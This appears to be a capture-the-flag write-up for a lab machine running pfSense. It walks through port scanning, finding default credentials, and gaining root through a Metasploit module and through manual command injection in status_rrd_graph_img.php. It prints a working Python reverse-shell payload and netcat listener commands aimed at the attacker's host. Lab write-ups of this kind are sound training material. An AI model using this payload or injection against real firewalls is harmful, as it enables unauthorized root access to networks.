Enumeration

Nmap discovered 2 open ports for http and ssl.

ORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open  ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Issuer: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-10-14T19:21:35
| Not valid after:  2023-04-06T19:21:35
| MD5:   65f8 b00f 57d2 3468 2c52 0f44 8110 c622
|_SHA-1: 4f7c 9a75 cb7f 70d3 8087 08cb 8c27 20dc 05f1 bb02
|_ssl-date: TLS randomness does not represent time

First, let’s add the host to hosts file, and go to the web application.

Apparently, the certificate is weird and the browser does not let me make an exception. So instead, let’s go to the application with just the IP in the URI:

Ok, going to the application with the IP works fine and a login form appears.
I have tried some default passwords and SQLi err check, with no success:

Wikipedia Info on PFSENSE

pfSense is a firewall / computer software distribution based on FreeBSD.

Searchsploit

# searchsploit pfsense

                                 Exploit | Path 

<deleted XSS and CSRF exploits>

pfSense - (Authenticated) Group Member Remote Command Execution (Metasploit)  | unix/remote/43193.rb

pfSense 2.3.1_1 - Command Execution               |    php/webapps/43128.txt

Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection  |     php/webapps/47413.py

pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection  |   php/webapps/43560.py

Exploit-DB

1. metasploit module RCE – requires authenticated user
2. python exploit command injection, reverse shel – requires auth
   1. “pfSense <= 2.1.3 status_rrd_graph_img.php Command Injection. This script will return a reverse shell on specified listener address and port. Ensure you have started a listener to catch the shell before running!“

Metasploit exploit modules

msf6 > search pfsense

Matching Modules
================

   #  Name                                       Disclosure Date      Rank       Check  Description
------------------------------------------------------------------------------------------------------------------------------------------

0  exploit/unix/http/pfsense_clickjacking          2017-11-21       normal     No     Clickjacking Vulnerability In CSRF Error Page pfSense
1  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
2  exploit/unix/http/pfsense_group_member_exec     2017-11-06       excellent  Yes    pfSense authenticated group member RCE

Dirbuster

Dirbuster did not find a single file or directory on port 80 (probably because of redirect/firewall rules). However, that is not the case for port 443.

The files system-users.txt, changelog.txt seem interesting. Let’s check them.

system-users.txt contents:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

We have a user Rohit with default credentials for pfsense.
According to NetgateDocs the default credentials for pfsense software are admin:pfsense so in our case should be rohit:pfsense

changelog.txt contents:

# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

Apparently there have been 3 vulnerabilities, 2 of which are patched and 1 still available.

Exploit

Let’s login with the obtained credentials (rohit:pfsense). There are multiple dropboxes in the interface, however only under status we have additional functionalities.

During our enumeration phase we discovered multiple xploits, information about the fact that there is an unpatched vulnerability and we have credentials. Some of the identified exploits require authentication – we should try them first.

Meterpreter

1  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE

Pbtaining a meterpreter from metasploit module pfsense_graph_injection_exec.

msf6 exploit(unix/http/pfsense_graph_injection_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39282 bytes) to 10.10.10.60
[+] Deleted KIXxVsv
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.60:15059) at 2021-04-14 09:43:38 -0400

meterpreter > shell
Process 97206 created.
Channel 0 created.
id
uid=0(root) gid=0(wheel) groups=0(wheel)

Manual exploitation

exploit-db

We know there is a command injection vulnerability somewhere. While googling more on that I’ve found the following post describing the command injection in status_rrd_graph_img.php in detail.

Within RRD GRAPHS is found the required php file whis is needed for this to work. Making a request from within the page with burp displays the following information:

GET /status_rrd_graph_img.php?start=1618380935&end=1618409735&database=system-processor.rrd&style=inverse&graph=eight_hour HTTP/1.1

Host: 10.10.10.60
Connection: close
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://10.10.10.60/status_rrd_graph.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4dbcd8342e5f415d50a83af577962a2e; cookie_test=1618413161

We’re interested in invoking queues database and inject our commands right after it:

Unfortunately the response is in gibberish which we don’t speak. A neat little trick is to pipe the response to netcat therefore making it readable like so:

Resulting in:

# nc -nvlp 3333  
listening on [any] 3333 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 59699
CMD INJECT

In order for us to open a reverse shell we have to feed the request with our own python script from the said python exploit.

$ cat pipe-reverse.py                        
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.5",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

# nc -nvlp 3333 < pipe-reverse.py 
listening on [any] 3333 ...

$ nc -nvlp 1234
listening on [any] 1234 ...

connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 20248
sh: can't access tty; job control turned off
# # id  
uid=0(root) gid=0(wheel) groups=0(wheel)

There might be need to press “cancel” request on burp in order to activate the python script for the reverse shell.